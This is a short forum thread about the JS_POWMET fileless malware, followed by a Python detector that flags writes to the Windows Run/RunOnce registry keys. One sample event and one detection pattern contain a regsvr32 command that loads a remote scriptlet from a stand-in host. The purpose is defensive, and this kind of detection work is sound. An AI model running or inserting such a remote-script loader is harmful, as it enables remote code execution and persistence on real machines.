Do the regsvr32 command line options look familiar, folks? http://blog.trendmicro.com/trendlab...e/look-js_powmet-completely-fileless-malware/
There are several techniques to load PowerShell scripts without powershell.exe. This malware could be modified to do it.
You stop malware like this by using a security solution that monitors what is written to registry run and run once keys. Anything after that point is a losing effort.
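
The monitoring idea from the last post, as an added example (not code from the thread or from any security product): it reports every write to a Run or RunOnce key and only uses the value data to set priority, so a loader that avoids powershell.exe is still surfaced. The event field names, tag patterns and sample events are constructed assumptions.

```python
import re

# Autostart keys named in the thread: Run and RunOnce, under any hive or user SID.
AUTORUN_KEY = re.compile(
    r"\\Software\\(?:WOW6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$",
    re.IGNORECASE,
)

# Heuristic tags (assumed patterns, not a complete list).
TAGS = {
    "regsvr32-remote-scriptlet": re.compile(r"regsvr32(?:\.exe)?\b.*?/i:\s*https?://", re.I),
    "script-host": re.compile(r"\b(?:mshta|wscript|cscript|rundll32)(?:\.exe)?\b", re.I),
    "powershell-host": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "url-in-value": re.compile(r"https?://", re.I),
}

def triage(event):
    """Return None for writes outside Run/RunOnce, else (severity, tags)."""
    if not AUTORUN_KEY.search(event["key"]):
        return None
    tags = sorted(name for name, rx in TAGS.items() if rx.search(event["data"]))
    # Every autorun write is reported; tags only raise the priority, because a
    # payload that avoids powershell.exe would slip past a name-only match.
    return ("high" if tags else "review", tags)

def scan(events):
    """Return (value name, severity, tags) for every autorun write seen."""
    hits = []
    for ev in events:
        verdict = triage(ev)
        if verdict:
            hits.append((ev["value"], *verdict))
    return hits

# Constructed sample events; field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"key": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater",
     "data": "regsvr32 /i:http://example.invalid/a.sct scrobj.dll"},
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
     "value": "Helper",
     "data": r"C:\Tools\host.exe C:\Users\Public\task.dat"},
    {"key": r"HKLM\SOFTWARE\Vendor\Settings",
     "value": "Path",
     "data": "powershell.exe -nop"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```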